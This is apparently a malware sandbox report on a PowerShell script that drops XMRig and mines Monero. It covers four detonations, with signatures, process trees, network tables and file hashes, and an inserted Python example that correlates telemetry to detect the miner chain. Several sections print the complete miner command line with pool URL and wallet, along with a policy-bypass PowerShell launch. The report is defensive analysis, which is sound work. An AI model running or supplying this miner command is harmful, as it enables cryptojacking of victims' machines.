memory/4532-110-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-111-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-112-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-113-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-114-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-115-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-116-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-117-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-118-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-119-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-120-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-121-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-122-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-123-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-124-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-125-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-126-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-127-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-128-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-129-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-130-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-131-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-132-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-133-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-134-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-135-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-136-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-137-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-138-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-139-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-140-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-141-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-142-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-143-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-144-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-145-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-146-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-147-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-148-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-149-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-150-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-151-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-152-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-153-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-154-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-155-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-156-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:14
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4560 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4560 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4208,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4088 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4072,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.167.79.40.in-addr.arpa | udp |
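Read together, the Signatures, Processes and Network sections describe a chain rather than one indicator: powershell.exe started with -ExecutionPolicy bypass, connections to github.com and objects.githubusercontent.com (consistent with fetching the xmrig-6.21.3 release archive whose directory name appears in the dropped path), a child executable in the user's Temp directory enabling SeLockMemoryPrivilege (XMRig requests it for large pages), and a TLS connection to rx.unmineable.com on 443. The "PID 4560 wrote to memory of 4988" WriteProcessMemory entries are the parent setting up the child it has just created, which is ordinary CreateProcess behaviour and not evidence of injection. The example below is added and is not part of the report: it runs a scored correlation over constructed telemetry events that mirror this report's data (Sysmon-like field names, an assumed explorer.exe parent and Edge noise added for contrast), and only flags a process once several of these weak signals coincide.

```python
"""Scored correlation for the miner chain recorded in this report (added
example). Event field names are illustrative, not a specific log schema."""
import re

POOL_DOMAINS = {"rx.unmineable.com"}   # from the Network table; extend from intel
USER_TEMP = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
POLICY_BYPASS = re.compile(r"-e[xp]\w*\s+(bypass|unrestricted)\b", re.I)
STRATUM_URL = re.compile(r"\bstratum(\+(ssl|tls|tcp))?://", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
MINER = r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe"

# Constructed telemetry. PIDs 4560/4988, images, command lines, the privilege
# and the DNS names are the report's (behavioral19); the explorer.exe parent
# (ppid 1234) and the Edge process are assumptions added as benign noise.
EVENTS = [
    {"type": "process_create", "pid": 4560, "ppid": 1234, "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File '
                r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"'},
    {"type": "dns_query", "pid": 4560, "query": "github.com"},
    {"type": "dns_query", "pid": 4560, "query": "objects.githubusercontent.com"},
    {"type": "process_create", "pid": 4988, "ppid": 4560, "image": MINER, "parent_image": PS,
     "cmdline": f'"{MINER}" -a rx -o stratum+ssl://rx.unmineable.com:443 '
                "-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
                ".unmineable_worker_vilqtiac -p x"},
    {"type": "token_adjust", "pid": 4988, "enabled": ["SeLockMemoryPrivilege"]},
    {"type": "dns_query", "pid": 4988, "query": "rx.unmineable.com"},
    {"type": "net_connect", "pid": 4988, "dst": "161.35.34.195", "dport": 443},
    {"type": "process_create", "pid": 5100, "ppid": 5000, "image": EDGE, "parent_image": EDGE,
     "cmdline": f'"{EDGE}" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService'},
    {"type": "dns_query", "pid": 5100, "query": "www.bing.com"},
    {"type": "net_connect", "pid": 5100, "dst": "23.62.61.97", "dport": 443},
]


def miner_chain_findings(events, min_hits=3):
    """Return {pid: [reasons]} for processes that accumulate at least min_hits
    of the weak signals below. None is conclusive alone: policy overrides are
    common in admin scripts, Temp-resident binaries are common in installers,
    and port 443 says nothing because stratum+ssl is HTTPS-shaped. The parent's
    WriteProcessMemory into its new child is normal CreateProcess behaviour and
    is deliberately not scored."""
    procs = {e["pid"]: e for e in events if e["type"] == "process_create"}
    by_pid = {}
    for e in events:
        by_pid.setdefault(e.get("pid"), []).append(e)
    findings = {}
    for pid, p in procs.items():
        hits = []
        parent = procs.get(p["ppid"])
        if (p["parent_image"].lower().endswith("\\powershell.exe")
                and parent and POLICY_BYPASS.search(parent["cmdline"])):
            hits.append("child of powershell.exe started with an execution-policy override")
        if USER_TEMP.match(p["image"]):
            hits.append("image executes from the user's Temp directory")
        if STRATUM_URL.search(p["cmdline"]):
            hits.append("stratum pool URL on the command line")
        for e in by_pid.get(pid, []):
            if e["type"] == "token_adjust" and "SeLockMemoryPrivilege" in e["enabled"]:
                hits.append("enabled SeLockMemoryPrivilege (large pages for RandomX)")
            elif e["type"] == "dns_query" and e["query"].lower() in POOL_DOMAINS:
                hits.append(f"resolved known pool host {e['query']}")
        if len(hits) >= min_hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, reasons in miner_chain_findings(EVENTS).items():
        print(pid, *reasons, sep="\n  ")
```

With the constructed events only the xmrig.exe process (PID 4988) crosses the threshold; the PowerShell launcher itself and the Edge utility process score nothing, which is the point of requiring several independent signals before alerting. On real telemetry the DNS and privilege checks map to Sysmon event 22 and Security event 4703 respectively, and the process-tree checks to Sysmon event 1.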
Files
memory/4560-0-0x00007FFC06943000-0x00007FFC06945000-memory.dmp
memory/4560-1-0x000001DDFE840000-0x000001DDFE862000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3zqb21yt.tmx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4560-11-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4560-12-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4560-14-0x00007FFC06940000-0x00007FFC07401000-memory.dmp
memory/4560-15-0x000001DDFCB60000-0x000001DDFCB72000-memory.dmp
memory/4560-16-0x000001DDFCB50000-0x000001DDFCB5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:05
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2024 wrote to memory of 1168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2024 wrote to memory of 1168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4blua5mn.sh0.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:08
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4500 wrote to memory of 1384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4500 wrote to memory of 1384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hf54yurm.foy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:13
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4196 wrote to memory of 5052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4196 wrote to memory of 5052 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oc10xnqt.d4z.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5052-134-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-135-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-136-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-137-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-138-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-139-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-140-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-141-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-142-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-143-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-144-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-145-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-146-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-147-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-148-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-149-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-150-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
